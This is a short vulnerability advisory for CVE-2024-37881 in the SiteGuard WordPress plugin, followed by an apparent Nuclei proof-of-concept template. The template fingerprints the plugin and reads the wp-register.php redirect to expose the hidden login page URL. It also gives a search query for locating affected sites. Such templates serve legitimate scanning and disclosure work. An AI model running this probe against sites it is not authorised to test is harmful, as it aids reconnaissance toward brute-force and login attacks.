The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.
PoC代码[已公开]
id: CVE-2024-37881
info:
name: SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure
author: s4e-io
severity: medium
description: |
The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37881
- https://jvn.jp/en/jp/JVN60331535/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/siteguard/siteguard-wp-plugin-176-login-page-disclosure
- https://www.usom.gov.tr/bildirim/tr-24-0726
classification:
epss-score: 0.03304
epss-percentile: 0.8676
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/siteguard/"
tags: cve,cve-2024,siteguard,wp-plugin
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt"
matchers:
- type: dsl
internal: true
dsl:
- "status_code == 200"
- 'contains(body, "SiteGuard WP Plugin")'
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-register.php"
matchers:
- type: dsl
dsl:
- "!contains(tolower(location), 'wp-login.php')"
extractors:
- type: kval
kval:
- location
# digest: 490a004630440220368968595c5db8284f95a98b775a15ced6643905e710ecb0bd0bb390d4ebd45c0220449aa025e5b9d31acf081c46c1352edcb81463cb263e764db9e5b32a229c1ac4:922c64590222798bb761d5b6d8e72950